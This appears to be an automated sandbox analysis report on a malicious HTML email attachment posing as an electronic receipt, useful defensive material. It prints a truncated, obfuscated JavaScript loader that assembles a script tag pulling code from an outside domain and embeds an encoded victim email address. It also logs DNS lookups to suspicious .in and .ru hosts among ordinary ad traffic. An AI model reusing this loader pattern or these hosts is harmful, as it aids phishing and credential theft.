                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.81333741351113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • HyperText Markup Language (6006/1) 100.00%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File name:Electronic_Receipt_ATT0001.htm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File size:1'451 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:b1de484f37a8c1e01bf73e7715497d90
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:69896e52b0f5f24a1b9c92925d5ada7e300e3f18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256:937fd7b138665e64f179bb91b9ec4bf3622d7963bb79f925bea3ef0a4650c792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512:90b3573d6a5e99c896ca58c08e39904a76f71d70f9f1a766b1a1fa190336085f5e7fc8c2d6d44cc8492908b0460be90515ece3018a966ede3e21fe8fbf2b1988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:ipQVqPZQj/hJQHV6EVWlIq/dYzq0H6qV8wq7AE8NLMTF1cM:ipqqPZQjZegEVWhaqT3dTF1/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TLSH:163163D112C0679A0F06D37BAB589D0DF6A1521C764272E839FE3528B3A8F5998C44FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Content Preview:<html>....<script>..yak = `#dHNhbGNpZG9Ac3RpbnNvbnMuY29t`;..giraffe = ['w','ri','te'].join('') /* peacock */; ..robin = ['<s','cri','pt s', /* hippo */'rc='].join(''); ....nutcracker=["htt", /* jackfruit */ "ps://","lipsoft",`in
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:17.368062019 CEST192.168.2.41.1.1.10xcfd1Standard query (0)lipsoftinc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:17.368284941 CEST192.168.2.41.1.1.10x4550Standard query (0)lipsoftinc.in65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.141417027 CEST192.168.2.41.1.1.10x520fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.141695976 CEST192.168.2.41.1.1.10x97a7Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.144742966 CEST192.168.2.41.1.1.10xd61dStandard query (0)lipsoftinc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.144953012 CEST192.168.2.41.1.1.10x5928Standard query (0)lipsoftinc.in65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.968091011 CEST192.168.2.41.1.1.10xf298Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.968256950 CEST192.168.2.41.1.1.10x9fabStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:19.089273930 CEST192.168.2.41.1.1.10xa880Standard query (0)href.liA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:19.089440107 CEST192.168.2.41.1.1.10x16a5Standard query (0)href.li65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:19.856451035 CEST192.168.2.41.1.1.10x6b85Standard query (0)hfj.rontishet.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:19.856601000 CEST192.168.2.41.1.1.10xb4e5Standard query (0)hfj.rontishet.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:21.754618883 CEST192.168.2.41.1.1.10x7314Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:21.755229950 CEST192.168.2.41.1.1.10x74fbStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.869733095 CEST192.168.2.41.1.1.10xbcb3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.870187998 CEST192.168.2.41.1.1.10xa462Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.870728016 CEST192.168.2.41.1.1.10xfa7bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.870937109 CEST192.168.2.41.1.1.10x237cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.871347904 CEST192.168.2.41.1.1.10x15bfStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.871640921 CEST192.168.2.41.1.1.10x313aStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.045043945 CEST192.168.2.41.1.1.10xb0Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.045214891 CEST192.168.2.41.1.1.10x8556Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.242700100 CEST192.168.2.41.1.1.10x712fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.242940903 CEST192.168.2.41.1.1.10x79c7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.277154922 CEST192.168.2.41.1.1.10x9560Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.277467966 CEST192.168.2.41.1.1.10xfa03Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:27.991656065 CEST192.168.2.41.1.1.10xba56Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:27.991940975 CEST192.168.2.41.1.1.10x82a8Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:51.250118971 CEST192.168.2.41.1.1.10xee6aStandard query (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:51.250402927 CEST192.168.2.41.1.1.10xe9b8Standard query (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.203831911 CEST192.168.2.41.1.1.10xa0b4Standard query (0)yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.204545975 CEST192.168.2.41.1.1.10x9470Standard query (0)yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.215620041 CEST192.168.2.41.1.1.10x51deStandard query (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.215833902 CEST192.168.2.41.1.1.10xd214Standard query (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.949795008 CEST192.168.2.41.1.1.10x5dfeStandard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.950012922 CEST192.168.2.41.1.1.10x6337Standard query (0)www.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.279002905 CEST192.168.2.41.1.1.10x9bcbStandard query (0)geo.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.279378891 CEST192.168.2.41.1.1.10x4922Standard query (0)geo.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.280281067 CEST192.168.2.41.1.1.10x1752Standard query (0)geo.query.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.280427933 CEST192.168.2.41.1.1.10x2913Standard query (0)geo.query.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.281244040 CEST192.168.2.41.1.1.10xbba4Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.281466961 CEST192.168.2.41.1.1.10x3c9Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.290853024 CEST192.168.2.41.1.1.10xaca6Standard query (0)search.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.290992975 CEST192.168.2.41.1.1.10x7e1cStandard query (0)search.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.903410912 CEST192.168.2.41.1.1.10x211dStandard query (0)consent.cmp.oath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.903940916 CEST192.168.2.41.1.1.10x2af6Standard query (0)consent.cmp.oath.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.230921030 CEST192.168.2.41.1.1.10x805cStandard query (0)edge-mcdn.secure.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.231165886 CEST192.168.2.41.1.1.10x9470Standard query (0)edge-mcdn.secure.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.646111965 CEST192.168.2.41.1.1.10x6702Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.646248102 CEST192.168.2.41.1.1.10x1e57Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.390523911 CEST192.168.2.41.1.1.10xc956Standard query (0)guce.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.390714884 CEST192.168.2.41.1.1.10xf18cStandard query (0)guce.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.465783119 CEST192.168.2.41.1.1.10xb8e8Standard query (0)edge-mcdn.secure.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.466056108 CEST192.168.2.41.1.1.10xce4Standard query (0)edge-mcdn.secure.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.468776941 CEST192.168.2.41.1.1.10x8674Standard query (0)consent.cmp.oath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.469091892 CEST192.168.2.41.1.1.10x534aStandard query (0)consent.cmp.oath.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.400139093 CEST192.168.2.41.1.1.10x9e6Standard query (0)guce.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.400290012 CEST192.168.2.41.1.1.10x7745Standard query (0)guce.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.834243059 CEST192.168.2.41.1.1.10x623fStandard query (0)udc.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.834579945 CEST192.168.2.41.1.1.10x8433Standard query (0)udc.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.888849020 CEST192.168.2.41.1.1.10x7fa4Standard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.888849974 CEST192.168.2.41.1.1.10x45dfStandard query (0)www.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.398951054 CEST192.168.2.41.1.1.10x92c9Standard query (0)noa.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.399121046 CEST192.168.2.41.1.1.10x6716Standard query (0)noa.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.414666891 CEST192.168.2.41.1.1.10x7fd2Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.414803982 CEST192.168.2.41.1.1.10xd438Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.415159941 CEST192.168.2.41.1.1.10x1ec7Standard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.415282965 CEST192.168.2.41.1.1.10xe773Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.416065931 CEST192.168.2.41.1.1.10x6857Standard query (0)opus.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.416188955 CEST192.168.2.41.1.1.10xfabStandard query (0)opus.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.649660110 CEST192.168.2.41.1.1.10xf524Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.650168896 CEST192.168.2.41.1.1.10xf48cStandard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.787791967 CEST192.168.2.41.1.1.10xe0cfStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.787983894 CEST192.168.2.41.1.1.10xbf52Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.788455963 CEST192.168.2.41.1.1.10x8288Standard query (0)gps-aa.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.788650036 CEST192.168.2.41.1.1.10x86f6Standard query (0)gps-aa.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.814789057 CEST192.168.2.41.1.1.10x69feStandard query (0)opus.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.814955950 CEST192.168.2.41.1.1.10xf304Standard query (0)opus.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.307879925 CEST192.168.2.41.1.1.10xe67fStandard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.308074951 CEST192.168.2.41.1.1.10x6bbdStandard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.499340057 CEST192.168.2.41.1.1.10xce1eStandard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.499536037 CEST192.168.2.41.1.1.10x3ba0Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.511583090 CEST192.168.2.41.1.1.10xec0eStandard query (0)pa.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.513340950 CEST192.168.2.41.1.1.10x4cfcStandard query (0)pa.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.916390896 CEST192.168.2.41.1.1.10x1fd1Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.917571068 CEST192.168.2.41.1.1.10x592Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.932152987 CEST192.168.2.41.1.1.10x635dStandard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.932440996 CEST192.168.2.41.1.1.10xe888Standard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.007889032 CEST192.168.2.41.1.1.10x5c32Standard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.008394003 CEST192.168.2.41.1.1.10x888bStandard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.959283113 CEST192.168.2.41.1.1.10x8020Standard query (0)beacon.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.959647894 CEST192.168.2.41.1.1.10xbd2cStandard query (0)beacon.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.210766077 CEST192.168.2.41.1.1.10x32e7Standard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.210968971 CEST192.168.2.41.1.1.10x931eStandard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.452768087 CEST192.168.2.41.1.1.10x1452Standard query (0)api.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.452991009 CEST192.168.2.41.1.1.10xbd23Standard query (0)api.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.211580038 CEST192.168.2.41.1.1.10x7f7eStandard query (0)pm-widget.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.211860895 CEST192.168.2.41.1.1.10x6ccaStandard query (0)pm-widget.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.212899923 CEST192.168.2.41.1.1.10x7d21Standard query (0)gum.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.212899923 CEST192.168.2.41.1.1.10x45d3Standard query (0)gum.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.213423967 CEST192.168.2.41.1.1.10xb973Standard query (0)tsdtocl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.213609934 CEST192.168.2.41.1.1.10xc46bStandard query (0)tsdtocl.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.217854023 CEST192.168.2.41.1.1.10x73adStandard query (0)api.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.217854023 CEST192.168.2.41.1.1.10xaa0cStandard query (0)api.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.962356091 CEST192.168.2.41.1.1.10x78e2Standard query (0)pm-widget.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.962661028 CEST192.168.2.41.1.1.10x432eStandard query (0)pm-widget.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:08.099445105 CEST192.168.2.41.1.1.10xa039Standard query (0)gum.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:08.099632978 CEST192.168.2.41.1.1.10x9177Standard query (0)gum.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.214821100 CEST192.168.2.41.1.1.10xdd70Standard query (0)tags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.215112925 CEST192.168.2.41.1.1.10x7b18Standard query (0)tags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.218445063 CEST192.168.2.41.1.1.10x2065Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.218605995 CEST192.168.2.41.1.1.10x9002Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.366931915 CEST192.168.2.41.1.1.10x207eStandard query (0)aa.agkn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.367084980 CEST192.168.2.41.1.1.10xad89Standard query (0)aa.agkn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.527425051 CEST192.168.2.41.1.1.10xea4aStandard query (0)uipglob.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.527537107 CEST192.168.2.41.1.1.10x7fcStandard query (0)uipglob.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.486877918 CEST192.168.2.41.1.1.10x1150Standard query (0)cms.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.487193108 CEST192.168.2.41.1.1.10xe4Standard query (0)cms.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.514161110 CEST192.168.2.41.1.1.10xabfeStandard query (0)tags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.514832973 CEST192.168.2.41.1.1.10x10efStandard query (0)tags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.664259911 CEST192.168.2.41.1.1.10x742cStandard query (0)images.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.664762974 CEST192.168.2.41.1.1.10xecadStandard query (0)images.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.666774988 CEST192.168.2.41.1.1.10xceb6Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.666986942 CEST192.168.2.41.1.1.10xa043Standard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.031723976 CEST192.168.2.41.1.1.10x204aStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.031996012 CEST192.168.2.41.1.1.10x44acStandard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.078206062 CEST192.168.2.41.1.1.10x228eStandard query (0)pips.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.078419924 CEST192.168.2.41.1.1.10x18d8Standard query (0)pips.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.140074968 CEST192.168.2.41.1.1.10x6247Standard query (0)cds.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.140341997 CEST192.168.2.41.1.1.10xedb3Standard query (0)cds.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.199995041 CEST192.168.2.41.1.1.10x6b3fStandard query (0)i.clean.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.200319052 CEST192.168.2.41.1.1.10x305bStandard query (0)i.clean.gg65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.429166079 CEST192.168.2.41.1.1.10xf2ddStandard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.429327011 CEST192.168.2.41.1.1.10xae81Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.438347101 CEST192.168.2.41.1.1.10xcd49Standard query (0)idx.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.438524008 CEST192.168.2.41.1.1.10xeef0Standard query (0)idx.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.835872889 CEST192.168.2.41.1.1.10xc90Standard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.836018085 CEST192.168.2.41.1.1.10x11d0Standard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.854415894 CEST192.168.2.41.1.1.10xd6d8Standard query (0)fastlane.rubiconproject.comA (IP address)IN (0x0001)false
